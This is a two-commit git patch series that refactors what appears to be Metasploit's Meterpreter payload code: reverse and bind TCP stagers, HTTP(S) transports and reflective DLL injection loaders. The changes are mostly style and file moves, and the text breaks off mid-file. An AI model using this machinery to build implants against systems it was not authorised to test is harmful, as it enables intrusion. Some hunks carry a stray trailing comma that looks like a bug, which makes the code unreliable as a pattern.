From 42f94e70c7f4a2b2f0ae47810a056be28bf45014 Mon Sep 17 00:00:00 2001 From: OJ Date: Tue, 12 May 2015 09:05:58 +1000 Subject: [PATCH 1/2] Add `nil` default to exit_types, transport param order swap This allows for checking against exit types to be super easy instead of having to have extra checks in place. Also changed the order of scope_id and uri in the transport URI generation. The net effect of this is NOP because these things only appear separately. --- lib/msf/core/payload/windows.rb | 4 +++- lib/rex/payloads/meterpreter/config.rb | 8 ++------ 2 files changed, 5 insertions(+), 7 deletions(-) diff --git a/lib/msf/core/payload/windows.rb b/lib/msf/core/payload/windows.rb index 84d380e16a..f05324a63a 100644 --- a/lib/msf/core/payload/windows.rb +++ b/lib/msf/core/payload/windows.rb @@ -34,10 +34,12 @@ module Msf::Payload::Windows # @@exit_types = { + nil => 0, # Default to nothing + '' => 0, # Default to nothing 'seh' => 0xEA320EFE, # SetUnhandledExceptionFilter 'thread' => 0x0A2A1DE0, # ExitThread 'process' => 0x56A2B5F0, # ExitProcess - 'none' => 0x5DE2C5AA, # GetLastError + 'none' => 0x5DE2C5AA # GetLastError } # diff --git a/lib/rex/payloads/meterpreter/config.rb b/lib/rex/payloads/meterpreter/config.rb index 49292b5331..ede3250504 100644 --- a/lib/rex/payloads/meterpreter/config.rb +++ b/lib/rex/payloads/meterpreter/config.rb @@ -49,11 +49,7 @@ private def session_block(opts) uuid = to_str(opts[:uuid].to_raw, UUID_SIZE) - if opts[:exitfunk] - exit_func = Msf::Payload::Windows.exit_types[opts[:exitfunk]] - else - exit_func = 0 - end + exit_func = Msf::Payload::Windows.exit_types[opts[:exitfunk]] session_data = [ 0, # comms socket, patched in by the stager @@ -74,8 +70,8 @@ private end url = "#{opts[:scheme]}://#{lhost}:#{opts[:lport]}" - url << "?#{opts[:scope_id]}" if opts[:scope_id] url << "#{opts[:uri]}/" if opts[:uri] + url << "?#{opts[:scope_id]}" if opts[:scope_id] # if the transport URI is for a HTTP payload we need to add a stack # of other stuff From 69d2b8ffb1994f990311065d53235d60ac74acf7 Mon Sep 17 00:00:00 2001 From: OJ Date: Tue, 12 May 2015 09:25:02 +1000 Subject: [PATCH 2/2] Various code format, style changes, file moves As per Egypt's suggestions. --- lib/msf/core/handler/reverse_hop_http.rb | 8 ++--- lib/msf/core/handler/reverse_http.rb | 8 ++--- lib/msf/core/payload/linux/bind_tcp.rb | 22 +++++++------- lib/msf/core/payload/linux/reverse_tcp.rb | 30 ++++++++----------- .../core/{ => payload}/transport_config.rb | 2 +- lib/msf/core/payload/windows/bind_tcp.rb | 24 +++++++-------- .../payload/windows/meterpreter_loader.rb | 11 ++++--- .../payload/windows/reflectivedllinject.rb | 9 +++--- lib/msf/core/payload/windows/reverse_http.rb | 4 +-- lib/msf/core/payload/windows/reverse_tcp.rb | 26 +++++++--------- .../core/payload/windows/reverse_winhttp.rb | 4 +-- .../core/payload/windows/reverse_winhttps.rb | 4 +-- lib/msf/core/payload/windows/x64/bind_tcp.rb | 23 +++++++------- .../payload/windows/x64/meterpreter_loader.rb | 11 ++++--- .../windows/x64/reflectivedllinject.rb | 9 +++--- .../core/payload/windows/x64/reverse_tcp.rb | 30 ++++++++----------- .../singles/windows/meterpreter_bind_tcp.rb | 24 +++++++-------- .../windows/meterpreter_reverse_http.rb | 24 +++++++-------- .../windows/meterpreter_reverse_https.rb | 24 +++++++-------- .../windows/meterpreter_reverse_ipv6_tcp.rb | 24 +++++++-------- .../windows/meterpreter_reverse_tcp.rb | 24 +++++++-------- .../windows/x64/meterpreter_bind_tcp.rb | 24 +++++++-------- .../windows/x64/meterpreter_reverse_http.rb | 24 +++++++-------- .../windows/x64/meterpreter_reverse_https.rb | 24 +++++++-------- .../x64/meterpreter_reverse_ipv6_tcp.rb | 24 +++++++-------- .../windows/x64/meterpreter_reverse_tcp.rb | 24 +++++++-------- 26 files changed, 220 insertions(+), 245 deletions(-) rename lib/msf/core/{ => payload}/transport_config.rb (98%) diff --git a/lib/msf/core/handler/reverse_hop_http.rb b/lib/msf/core/handler/reverse_hop_http.rb index b4b715d1f4..0ead3894a0 100644 --- a/lib/msf/core/handler/reverse_hop_http.rb +++ b/lib/msf/core/handler/reverse_hop_http.rb @@ -252,10 +252,10 @@ module ReverseHopHttp url = full_uri + conn_id + "/\x00" print_status("Preparing stage for next session #{conn_id}") - blob = stage_payload({ - :uuid => uuid, - :uri => conn_id - }) + blob = stage_payload( + uuid: uuid, + uri: conn_id + ) #send up crequest = mclient.request_raw( diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb index 6b63080445..d442d6727d 100644 --- a/lib/msf/core/handler/reverse_http.rb +++ b/lib/msf/core/handler/reverse_http.rb @@ -325,10 +325,10 @@ protected # generate the stage, but pass in the existing UUID and connection id so that # we don't get new ones generated. - blob = obj.stage_payload({ - :uuid => uuid, - :uri => conn_id - }) + blob = obj.stage_payload( + uuid: uuid, + uri: conn_id + ) resp.body = encode_stage(blob) diff --git a/lib/msf/core/payload/linux/bind_tcp.rb b/lib/msf/core/payload/linux/bind_tcp.rb index bb93a8d250..83b02fc4a4 100644 --- a/lib/msf/core/payload/linux/bind_tcp.rb +++ b/lib/msf/core/payload/linux/bind_tcp.rb @@ -1,7 +1,7 @@ # -*- coding: binary -*- require 'msf/core' -require 'msf/core/transport_config' +require 'msf/core/payload/transport_config' module Msf @@ -15,26 +15,24 @@ module Msf module Payload::Linux::BindTcp - include Msf::TransportConfig + include Msf::Payload::TransportConfig include Msf::Payload::Linux # # Generate the first stage # def generate - - # Generate the simple version of this stager if we don't have enough space - if self.available_space.nil? || required_space > self.available_space - return generate_bind_tcp({ - :port => datastore['LPORT'] - }) - end - conf = { - :port => datastore['LPORT'], - :reliable => true + port: datastore['LPORT'], + reliable: false } + # Generate the more advanced stager if we have the space + unless self.available_space.nil? || required_space > self.available_space + conf[:exitfunk] = datastore['EXITFUNC'], + conf[:reliable] = true + end + generate_bind_tcp(conf) end diff --git a/lib/msf/core/payload/linux/reverse_tcp.rb b/lib/msf/core/payload/linux/reverse_tcp.rb index a2d0fca9da..5b190f93b0 100644 --- a/lib/msf/core/payload/linux/reverse_tcp.rb +++ b/lib/msf/core/payload/linux/reverse_tcp.rb @@ -1,7 +1,7 @@ # -*- coding: binary -*- require 'msf/core' -require 'msf/core/transport_config' +require 'msf/core/payload/transport_config' require 'msf/core/payload/linux' module Msf @@ -16,30 +16,26 @@ module Msf module Payload::Linux::ReverseTcp - include Msf::TransportConfig + include Msf::Payload::TransportConfig include Msf::Payload::Linux # # Generate the first stage # def generate - # Generate the simple version of this stager if we don't have enough space - if self.available_space.nil? || required_space > self.available_space - return generate_reverse_tcp( - port: datastore['LPORT'], - host: datastore['LHOST'], - retry_count: datastore['ReverseConnectRetries'], - ) - end - conf = { - host: datastore['LHOST'], - port: datastore['LPORT'], + port: datastore['LPORT'], + host: datastore['LHOST'], retry_count: datastore['ReverseConnectRetries'], - exitfunk: datastore['EXITFUNC'], - reliable: true + reliable: false } + # Generate the advanced stager if we have space + unless self.available_space.nil? || required_space > self.available_space + conf[:exitfunk] = datastore['EXITFUNC'] + conf[:reliable] = true + end + generate_reverse_tcp(conf) end @@ -79,8 +75,8 @@ module Payload::Linux::ReverseTcp # def asm_reverse_tcp(opts={}) # TODO: reliability is coming - #retry_count = [opts[:retry_count].to_i, 1].max - #reliable = opts[:reliable] + retry_count = [opts[:retry_count].to_i, 1].max + reliable = opts[:reliable] encoded_port = "0x%.8x" % [opts[:port].to_i,2].pack("vn").unpack("N").first encoded_host = "0x%.8x" % Rex::Socket.addr_aton(opts[:host]||"127.127.127.127").unpack("V").first diff --git a/lib/msf/core/transport_config.rb b/lib/msf/core/payload/transport_config.rb similarity index 98% rename from lib/msf/core/transport_config.rb rename to lib/msf/core/payload/transport_config.rb index 281f9686df..177684ed47 100644 --- a/lib/msf/core/transport_config.rb +++ b/lib/msf/core/payload/transport_config.rb @@ -6,7 +6,7 @@ require 'msf/core/payload/uuid_options' # This module contains helper functions for creating the transport # configuration stubs that are used for Meterpreter payloads. ## -module Msf::TransportConfig +module Msf::Payload::TransportConfig include Msf::Payload::UUIDOptions diff --git a/lib/msf/core/payload/windows/bind_tcp.rb b/lib/msf/core/payload/windows/bind_tcp.rb index 5eceff5d67..5aa6cd3f94 100644 --- a/lib/msf/core/payload/windows/bind_tcp.rb +++ b/lib/msf/core/payload/windows/bind_tcp.rb @@ -1,7 +1,7 @@ # -*- coding: binary -*- require 'msf/core' -require 'msf/core/transport_config' +require 'msf/core/payload/transport_config' require 'msf/core/payload/windows/block_api' require 'msf/core/payload/windows/exitfunk' @@ -17,7 +17,7 @@ module Msf module Payload::Windows::BindTcp - include Msf::TransportConfig + include Msf::Payload::TransportConfig include Msf::Payload::Windows include Msf::Payload::Windows::BlockApi include Msf::Payload::Windows::Exitfunk @@ -26,21 +26,17 @@ module Payload::Windows::BindTcp # Generate the first stage # def generate - - # Generate the simple version of this stager if we don't have enough space - if self.available_space.nil? || required_space > self.available_space - return generate_bind_tcp({ - :port => datastore['LPORT'].to_i, - :reliable => false - }) - end - conf = { - :port => datastore['LPORT'].to_i, - :exitfunk => datastore['EXITFUNC'], - :reliable => true + port: datastore['LPORT'], + reliable: false } + # Generate the more advanced stager if we have the space + unless self.available_space.nil? || required_space > self.available_space + conf[:exitfunk] = datastore['EXITFUNC'], + conf[:reliable] = true + end + generate_bind_tcp(conf) end diff --git a/lib/msf/core/payload/windows/meterpreter_loader.rb b/lib/msf/core/payload/windows/meterpreter_loader.rb index c053e82ba5..9047397807 100644 --- a/lib/msf/core/payload/windows/meterpreter_loader.rb +++ b/lib/msf/core/payload/windows/meterpreter_loader.rb @@ -71,9 +71,9 @@ module Payload::Windows::MeterpreterLoader dll, offset = load_rdi_dll(MetasploitPayloads.meterpreter_path('metsrv', 'x86.dll')) asm_opts = { - :rdi_offset => offset, - :length => dll.length, - :stageless => stageless + rdi_offset: offset, + length: dll.length, + stageless: stageless } asm = asm_invoke_metsrv(asm_opts) @@ -82,9 +82,8 @@ module Payload::Windows::MeterpreterLoader bootstrap = Metasm::Shellcode.assemble(Metasm::X86.new, asm).encode_string # sanity check bootstrap length to ensure we dont overwrite the DOS headers e_lfanew entry - if( bootstrap.length > 62 ) - print_error( "Meterpreter loader (x86) generated an oversized bootstrap!" ) - return + if bootstrap.length > 62 + raise RuntimeError, "Meterpreter loader (x86) generated an oversized bootstrap!" end # patch the bootstrap code into the dll's DOS header... diff --git a/lib/msf/core/payload/windows/reflectivedllinject.rb b/lib/msf/core/payload/windows/reflectivedllinject.rb index c0146ace04..50139c1e4f 100644 --- a/lib/msf/core/payload/windows/reflectivedllinject.rb +++ b/lib/msf/core/payload/windows/reflectivedllinject.rb @@ -75,8 +75,8 @@ module Payload::Windows::ReflectiveDllInject dll, offset = load_rdi_dll(library_path) asm_opts = { - :rdi_offset => offset, - :exitfunk => 'thread' # default to 'thread' for migration + rdi_offset: offset, + exitfunk: 'thread' # default to 'thread' for migration } asm = asm_invoke_dll(asm_opts) @@ -85,9 +85,8 @@ module Payload::Windows::ReflectiveDllInject bootstrap = Metasm::Shellcode.assemble(Metasm::X86.new, asm).encode_string # sanity check bootstrap length to ensure we dont overwrite the DOS headers e_lfanew entry - if( bootstrap.length > 62 ) - print_error( "Reflective Dll Injection (x86) generated an oversized bootstrap!" ) - return + if bootstrap.length > 62 + raise RuntimeError, "Reflective DLL Injection (x86) generated an oversized bootstrap!" end # patch the bootstrap code into the dll's DOS header... diff --git a/lib/msf/core/payload/windows/reverse_http.rb b/lib/msf/core/payload/windows/reverse_http.rb index 73958d3abf..71b3df71e2 100644 --- a/lib/msf/core/payload/windows/reverse_http.rb +++ b/lib/msf/core/payload/windows/reverse_http.rb @@ -1,7 +1,7 @@ # -*- coding: binary -*- require 'msf/core' -require 'msf/core/transport_config' +require 'msf/core/payload/transport_config' require 'msf/core/payload/windows/block_api' require 'msf/core/payload/windows/exitfunk' require 'msf/core/payload/uuid_options' @@ -18,7 +18,7 @@ module Msf module Payload::Windows::ReverseHttp - include Msf::TransportConfig + include Msf::Payload::TransportConfig include Msf::Payload::Windows include Msf::Payload::Windows::BlockApi include Msf::Payload::Windows::Exitfunk diff --git a/lib/msf/core/payload/windows/reverse_tcp.rb b/lib/msf/core/payload/windows/reverse_tcp.rb index c0e8e5102f..770effc317 100644 --- a/lib/msf/core/payload/windows/reverse_tcp.rb +++ b/lib/msf/core/payload/windows/reverse_tcp.rb @@ -1,7 +1,7 @@ # -*- coding: binary -*- require 'msf/core' -require 'msf/core/transport_config' +require 'msf/core/payload/transport_config' require 'msf/core/payload/windows/block_api' require 'msf/core/payload/windows/exitfunk' @@ -15,7 +15,7 @@ module Msf module Payload::Windows::ReverseTcp - include Msf::TransportConfig + include Msf::Payload::TransportConfig include Msf::Payload::Windows include Msf::Payload::Windows::BlockApi include Msf::Payload::Windows::Exitfunk @@ -24,23 +24,19 @@ module Payload::Windows::ReverseTcp # Generate the first stage # def generate - # Generate the simple version of this stager if we don't have enough space - if self.available_space.nil? || required_space > self.available_space - return generate_reverse_tcp( - port: datastore['LPORT'], - host: datastore['LHOST'], - retry_count: datastore['ReverseConnectRetries'], - ) - end - conf = { - host: datastore['LHOST'], - port: datastore['LPORT'], + port: datastore['LPORT'], + host: datastore['LHOST'], retry_count: datastore['ReverseConnectRetries'], - exitfunk: datastore['EXITFUNC'], - reliable: true + reliable: false } + # Generate the advanced stager if we have space + unless self.available_space.nil? || required_space > self.available_space + conf[:exitfunk] = datastore['EXITFUNC'] + conf[:reliable] = true + end + generate_reverse_tcp(conf) end diff --git a/lib/msf/core/payload/windows/reverse_winhttp.rb b/lib/msf/core/payload/windows/reverse_winhttp.rb index a3861b11a1..0b0f9bb625 100644 --- a/lib/msf/core/payload/windows/reverse_winhttp.rb +++ b/lib/msf/core/payload/windows/reverse_winhttp.rb @@ -1,7 +1,7 @@ # -*- coding: binary -*- require 'msf/core' -require 'msf/core/transport_config' +require 'msf/core/payload/transport_config' require 'msf/core/payload/windows/block_api' require 'msf/core/payload/windows/exitfunk' require 'msf/core/payload/windows/reverse_http' @@ -18,7 +18,7 @@ module Msf module Payload::Windows::ReverseWinHttp - include Msf::TransportConfig + include Msf::Payload::TransportConfig include Msf::Payload::Windows::ReverseHttp # diff --git a/lib/msf/core/payload/windows/reverse_winhttps.rb b/lib/msf/core/payload/windows/reverse_winhttps.rb index a91f2e4d30..1738f682ee 100644 --- a/lib/msf/core/payload/windows/reverse_winhttps.rb +++ b/lib/msf/core/payload/windows/reverse_winhttps.rb @@ -1,7 +1,7 @@ # -*- coding: binary -*- require 'msf/core' -require 'msf/core/transport_config' +require 'msf/core/payload/transport_config' require 'msf/core/payload/windows/reverse_winhttp' require 'msf/core/payload/windows/verify_ssl' require 'rex/payloads/meterpreter/uri_checksum' @@ -18,7 +18,7 @@ module Msf module Payload::Windows::ReverseWinHttps - include Msf::TransportConfig + include Msf::Payload::TransportConfig include Msf::Payload::Windows::ReverseWinHttp include Msf::Payload::Windows::VerifySsl diff --git a/lib/msf/core/payload/windows/x64/bind_tcp.rb b/lib/msf/core/payload/windows/x64/bind_tcp.rb index b7ebad198d..d630feb805 100644 --- a/lib/msf/core/payload/windows/x64/bind_tcp.rb +++ b/lib/msf/core/payload/windows/x64/bind_tcp.rb @@ -1,7 +1,7 @@ # -*- coding: binary -*- require 'msf/core' -require 'msf/core/transport_config' +require 'msf/core/payload/transport_config' require 'msf/core/payload/windows/x64/block_api' require 'msf/core/payload/windows/x64/exitfunk' @@ -15,7 +15,7 @@ module Msf module Payload::Windows::BindTcp_x64 - include Msf::TransportConfig + include Msf::Payload::TransportConfig include Msf::Payload::Windows include Msf::Payload::Windows::BlockApi_x64 include Msf::Payload::Windows::Exitfunk_x64 @@ -24,20 +24,17 @@ module Payload::Windows::BindTcp_x64 # Generate the first stage # def generate - # Generate the simple version of this stager if we don't have enough space - if self.available_space.nil? || required_space > self.available_space - return generate_bind_tcp({ - :port => datastore['LPORT'], - :reliable => false - }) - end - conf = { - :port => datastore['LPORT'], - :exitfunk => datastore['EXITFUNC'], - :reliable => true + port: datastore['LPORT'], + reliable: false } + # Generate the more advanced stager if we have the space + unless self.available_space.nil? || required_space > self.available_space + conf[:exitfunk] = datastore['EXITFUNC'], + conf[:reliable] = true + end + generate_bind_tcp(conf) end diff --git a/lib/msf/core/payload/windows/x64/meterpreter_loader.rb b/lib/msf/core/payload/windows/x64/meterpreter_loader.rb index c6507c5b2b..c618eec805 100644 --- a/lib/msf/core/payload/windows/x64/meterpreter_loader.rb +++ b/lib/msf/core/payload/windows/x64/meterpreter_loader.rb @@ -74,9 +74,9 @@ module Payload::Windows::MeterpreterLoader_x64 dll, offset = load_rdi_dll(MetasploitPayloads.meterpreter_path('metsrv', 'x64.dll')) asm_opts = { - :rdi_offset => offset, - :length => dll.length, - :stageless => stageless + rdi_offset: offset, + length: dll.length, + stageless: stageless } asm = asm_invoke_metsrv(asm_opts) @@ -85,9 +85,8 @@ module Payload::Windows::MeterpreterLoader_x64 bootstrap = Metasm::Shellcode.assemble(Metasm::X64.new, asm).encode_string # sanity check bootstrap length to ensure we dont overwrite the DOS headers e_lfanew entry - if( bootstrap.length > 62 ) - print_error( "Meterpreter loader (x64) generated an oversized bootstrap!" ) - return + if bootstrap.length > 62 + raise RuntimeError, "Meterpreter loader (x64) generated an oversized bootstrap!" end # patch the bootstrap code into the dll's DOS header... diff --git a/lib/msf/core/payload/windows/x64/reflectivedllinject.rb b/lib/msf/core/payload/windows/x64/reflectivedllinject.rb index 44dd5ec575..0194d902d3 100644 --- a/lib/msf/core/payload/windows/x64/reflectivedllinject.rb +++ b/lib/msf/core/payload/windows/x64/reflectivedllinject.rb @@ -76,8 +76,8 @@ module Payload::Windows::ReflectiveDllInject_x64 dll, offset = load_rdi_dll(library_path) asm_opts = { - :rdi_offset => offset, - :exitfunk => 'thread' # default to 'thread' for migration + rdi_offset: offset, + exitfunk: 'thread' # default to 'thread' for migration } asm = asm_invoke_dll(asm_opts) @@ -86,9 +86,8 @@ module Payload::Windows::ReflectiveDllInject_x64 bootstrap = Metasm::Shellcode.assemble(Metasm::X64.new, asm).encode_string # sanity check bootstrap length to ensure we dont overwrite the DOS headers e_lfanew entry - if( bootstrap.length > 62 ) - print_error( "Reflective Dll Injection (x64) generated an oversized bootstrap!" ) - return + if bootstrap.length > 62 + raise RuntimeError, "Reflective DLL Injection (x64) generated an oversized bootstrap!" end # patch the bootstrap code into the dll's DOS header... diff --git a/lib/msf/core/payload/windows/x64/reverse_tcp.rb b/lib/msf/core/payload/windows/x64/reverse_tcp.rb index e726687572..110a3a1294 100644 --- a/lib/msf/core/payload/windows/x64/reverse_tcp.rb +++ b/lib/msf/core/payload/windows/x64/reverse_tcp.rb @@ -1,7 +1,7 @@ # -*- coding: binary -*- require 'msf/core' -require 'msf/core/transport_config' +require 'msf/core/payload/transport_config' require 'msf/core/payload/windows/x64/block_api' require 'msf/core/payload/windows/x64/exitfunk' @@ -15,7 +15,7 @@ module Msf module Payload::Windows::ReverseTcp_x64 - include Msf::TransportConfig + include Msf::Payload::TransportConfig include Msf::Payload::Windows include Msf::Payload::Windows::BlockApi_x64 include Msf::Payload::Windows::Exitfunk_x64 @@ -31,24 +31,19 @@ module Payload::Windows::ReverseTcp_x64 # Generate the first stage # def generate - # TODO: coming later - # Generate the simple version of this stager if we don't have enough space - #if self.available_space.nil? || required_space > self.available_space - # return generate_reverse_tcp( - # port: datastore['LPORT'], - # host: datastore['LHOST'], - # retry_count: datastore['ReverseConnectRetries'], - # ) - #end - conf = { - host: datastore['LHOST'], port: datastore['LPORT'], + host: datastore['LHOST'], retry_count: datastore['ReverseConnectRetries'], - exitfunk: datastore['EXITFUNC'], - reliable: true + reliable: false } + # Generate the advanced stager if we have space + unless self.available_space.nil? || required_space > self.available_space + conf[:exitfunk] = datastore['EXITFUNC'] + conf[:reliable] = true + end + generate_reverse_tcp(conf) end @@ -98,8 +93,9 @@ module Payload::Windows::ReverseTcp_x64 # def asm_reverse_tcp(opts={}) - #retry_count = [opts[:retry_count].to_i, 1].max - # TODO: reliable = opts[:reliable] + # TODO: reliability coming later + reliable = opts[:reliable] + retry_count = [opts[:retry_count].to_i, 1].max encoded_port = [opts[:port].to_i,2].pack("vn").unpack("N").first encoded_host = Rex::Socket.addr_aton(opts[:host]||"127.127.127.127").unpack("V").first encoded_host_port = "0x%.8x%.8x" % [encoded_host, encoded_port] diff --git a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb index 43627c5433..ab8a59fe48 100644 --- a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -require 'msf/core/transport_config' +require 'msf/core/payload/transport_config' require 'msf/core/handler/bind_tcp' require 'msf/core/payload/windows/meterpreter_loader' require 'msf/base/sessions/meterpreter_x86_win' @@ -15,7 +15,7 @@ module Metasploit4 CachedSize = 906910 - include Msf::TransportConfig + include Msf::Payload::TransportConfig include Msf::Payload::Windows include Msf::Payload::Single include Msf::Payload::Windows::MeterpreterLoader @@ -45,20 +45,20 @@ module Metasploit4 def generate_config(opts={}) unless opts[:uuid] - opts[:uuid] = Msf::Payload::UUID.new({ - :platform => 'windows', - :arch => ARCH_X86 - }) + opts[:uuid] = Msf::Payload::UUID.new( + platform: 'windows', + arch: ARCH_X86 + ) end # create the configuration block config_opts = { - :arch => opts[:uuid].arch, - :exitfunk => datastore['EXITFUNC'], - :expiration => datastore['SessionExpirationTimeout'].to_i, - :uuid => opts[:uuid], - :transports => [transport_config_bind_tcp(opts)], - :extensions => (datastore['EXTENSIONS'] || '').split(',') + arch: opts[:uuid].arch, + exitfunk: datastore['EXITFUNC'], + expiration: datastore['SessionExpirationTimeout'].to_i, + uuid: opts[:uuid], + transports: [transport_config_bind_tcp(opts)], + extensions: (datastore['EXTENSIONS'] || '').split(',') } # create the configuration instance based off the parameters diff --git a/modules/payloads/singles/windows/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/meterpreter_reverse_http.rb index 0bd7fd2994..b12ad4d64e 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_http.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -require 'msf/core/transport_config' +require 'msf/core/payload/transport_config' require 'msf/core/handler/reverse_http' require 'msf/core/payload/windows/meterpreter_loader' require 'msf/base/sessions/meterpreter_x86_win' @@ -15,7 +15,7 @@ module Metasploit4 CachedSize = 907954 - include Msf::TransportConfig + include Msf::Payload::TransportConfig include Msf::Payload::Windows include Msf::Payload::Single include Msf::Payload::Windows::MeterpreterLoader @@ -45,20 +45,20 @@ module Metasploit4 def generate_config(opts={}) unless opts[:uuid] - opts[:uuid] = Msf::Payload::UUID.new({ - :platform => 'windows', - :arch => ARCH_X86 - }) + opts[:uuid] = Msf::Payload::UUID.new( + platform: 'windows', + arch: ARCH_X86 + ) end # create the configuration block config_opts = { - :arch => opts[:uuid].arch, - :exitfunk => datastore['EXITFUNC'], - :expiration => datastore['SessionExpirationTimeout'].to_i, - :uuid => opts[:uuid], - :transports => [transport_config_reverse_http(opts)], - :extensions => (datastore['EXTENSIONS'] || '').split(',') + arch: opts[:uuid].arch, + exitfunk: datastore['EXITFUNC'], + expiration: datastore['SessionExpirationTimeout'].to_i, + uuid: opts[:uuid], + transports: [transport_config_reverse_http(opts)], + extensions: (datastore['EXTENSIONS'] || '').split(',') } # create the configuration instance based off the parameters diff --git a/modules/payloads/singles/windows/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/meterpreter_reverse_https.rb index 9fe4cde3dc..5cbb815cca 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_https.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -require 'msf/core/transport_config' +require 'msf/core/payload/transport_config' require 'msf/core/handler/reverse_https' require 'msf/core/payload/windows/meterpreter_loader' require 'msf/base/sessions/meterpreter_x86_win' @@ -15,7 +15,7 @@ module Metasploit4 CachedSize = 907954 - include Msf::TransportConfig + include Msf::Payload::TransportConfig include Msf::Payload::Windows include Msf::Payload::Single include Msf::Payload::Windows::MeterpreterLoader @@ -45,20 +45,20 @@ module Metasploit4 def generate_config(opts={}) unless opts[:uuid] - opts[:uuid] = Msf::Payload::UUID.new({ - :platform => 'windows', - :arch => ARCH_X86 - }) + opts[:uuid] = Msf::Payload::UUID.new( + platform: 'windows', + arch: ARCH_X86 + ) end # create the configuration block config_opts = { - :arch => opts[:uuid].arch, - :exitfunk => datastore['EXITFUNC'], - :expiration => datastore['SessionExpirationTimeout'].to_i, - :uuid => opts[:uuid], - :transports => [transport_config_reverse_https(opts)], - :extensions => (datastore['EXTENSIONS'] || '').split(',') + arch: opts[:uuid].arch, + exitfunk: datastore['EXITFUNC'], + expiration: datastore['SessionExpirationTimeout'].to_i, + uuid: opts[:uuid], + transports: [transport_config_reverse_https(opts)], + extensions: (datastore['EXTENSIONS'] || '').split(',') } # create the configuration instance based off the parameters diff --git a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb index 971d5cd97a..1641594c5d 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -require 'msf/core/transport_config' +require 'msf/core/payload/transport_config' require 'msf/core/handler/reverse_tcp' require 'msf/core/payload/windows/meterpreter_loader' require 'msf/base/sessions/meterpreter_x86_win' @@ -15,7 +15,7 @@ module Metasploit4 CachedSize = 906910 - include Msf::TransportConfig + include Msf::Payload::TransportConfig include Msf::Payload::Windows include Msf::Payload::Single include Msf::Payload::Windows::MeterpreterLoader @@ -46,20 +46,20 @@ module Metasploit4 def generate_config(opts={}) unless opts[:uuid] - opts[:uuid] = Msf::Payload::UUID.new({ - :platform => 'windows', - :arch => ARCH_X86 - }) + opts[:uuid] = Msf::Payload::UUID.new( + platform: 'windows', + arch: ARCH_X86 + ) end # create the configuration block config_opts = { - :arch => opts[:uuid].arch, - :exitfunk => datastore['EXITFUNC'], - :expiration => datastore['SessionExpirationTimeout'].to_i, - :uuid => opts[:uuid], - :transports => [transport_config_reverse_ipv6_tcp(opts)], - :extensions => (datastore['EXTENSIONS'] || '').split(',') + arch: opts[:uuid].arch, + exitfunk: datastore['EXITFUNC'], + expiration: datastore['SessionExpirationTimeout'].to_i, + uuid: opts[:uuid], + transports: [transport_config_reverse_ipv6_tcp(opts)], + extensions: (datastore['EXTENSIONS'] || '').split(',') } # create the configuration instance based off the parameters diff --git a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb index 544bc8e525..62e36636f5 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -require 'msf/core/transport_config' +require 'msf/core/payload/transport_config' require 'msf/core/handler/reverse_tcp' require 'msf/core/payload/windows/meterpreter_loader' require 'msf/base/sessions/meterpreter_x86_win' @@ -15,7 +15,7 @@ module Metasploit3 CachedSize = 906910 - include Msf::TransportConfig + include Msf::Payload::TransportConfig include Msf::Payload::Windows include Msf::Payload::Single include Msf::Payload::Windows::MeterpreterLoader @@ -45,20 +45,20 @@ module Metasploit3 def generate_config(opts={}) unless opts[:uuid] - opts[:uuid] = Msf::Payload::UUID.new({ - :platform => 'windows', - :arch => ARCH_X86 - }) + opts[:uuid] = Msf::Payload::UUID.new( + platform: 'windows', + arch: ARCH_X86 + ) end # create the configuration block, which for staged connections is really simple. config_opts = { - :arch => opts[:uuid].arch, - :exitfunk => datastore['EXITFUNC'], - :expiration => datastore['SessionExpirationTimeout'].to_i, - :uuid => opts[:uuid], - :transports => [transport_config_reverse_tcp(opts)], - :extensions => (datastore['EXTENSIONS'] || '').split(',') + arch: opts[:uuid].arch, + exitfunk: datastore['EXITFUNC'], + expiration: datastore['SessionExpirationTimeout'].to_i, + uuid: opts[:uuid], + transports: [transport_config_reverse_tcp(opts)], + extensions: (datastore['EXTENSIONS'] || '').split(',') } # create the configuration instance based off the parameters diff --git a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb index 14d4fddf75..6cc62752b0 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -require 'msf/core/transport_config' +require 'msf/core/payload/transport_config' require 'msf/core/handler/bind_tcp' require 'msf/core/payload/windows/x64/meterpreter_loader' require 'msf/base/sessions/meterpreter_x64_win' @@ -15,7 +15,7 @@ module Metasploit4 CachedSize = 1128098 - include Msf::TransportConfig + include Msf::Payload::TransportConfig include Msf::Payload::Windows include Msf::Payload::Single include Msf::Payload::Windows::MeterpreterLoader_x64 @@ -45,20 +45,20 @@ module Metasploit4 def generate_config(opts={}) unless opts[:uuid] - opts[:uuid] = Msf::Payload::UUID.new({ - :platform => 'windows', - :arch => ARCH_X64 - }) + opts[:uuid] = Msf::Payload::UUID.new( + platform: 'windows', + arch: ARCH_X64 + ) end # create the configuration block, which for staged connections is really simple. config_opts = { - :arch => opts[:uuid].arch, - :exitfunk => datastore['EXITFUNC'], - :expiration => 